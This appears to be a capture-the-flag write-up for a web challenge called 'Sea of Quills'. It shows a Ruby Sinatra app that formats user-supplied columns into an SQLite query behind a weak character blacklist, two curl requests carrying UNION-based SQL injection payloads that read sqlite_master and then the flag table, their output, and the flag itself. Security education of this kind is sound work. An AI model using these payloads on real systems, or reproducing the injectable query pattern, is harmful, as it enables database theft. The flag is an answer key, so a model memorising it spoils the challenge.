Sea of Quills
Category: Web
70 points
Come check out our finest selection of quills!
app.rb
Author: JoshDaBosh
app.rb
require 'sinatra'
require 'sqlite3'
set :bind, "0.0.0.0"
set :port, 4567
get '/' do
db = SQLite3::Database.new "quills.db"
@row = db.execute( "select * from quills" )
erb :index
end
get '/quills' do
erb :quills
end
post '/quills' do
db = SQLite3::Database.new "quills.db"
cols = params[:cols]
lim = params[:limit]
off = params[:offset]
blacklist = ["-", "/", ";", "'", "\""]
blacklist.each { |word|
if cols.include? word
return "beep boop sqli detected!"
end
}
if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
return "bad, no quills for you!"
end
@row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])
p @row
erb :specific
end
Solution
To look around…
curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=tbl_name%2Cname%2Csql%20from%20sqlite_master%20union%20select%20url%2Cdesc%2Cname'
Honey in the output:
<img src="flagtable" class="w3 h3">
<li class="pb5 pl3">flagtable <ul><li>CREATE TABLE flagtable (
flag varchar(30)
)</li></ul></li><br />
Let’s take a look a bit closer…
curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=flag%2Cflag%2Cflag%20from%20flagtable%20union%20select%20url%2Cdesc%2Cname'
<img src="actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}" class="w3 h3">
<li class="pb5 pl3">actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df} <ul><li>actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}</li></ul></li><br />
Flag
actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}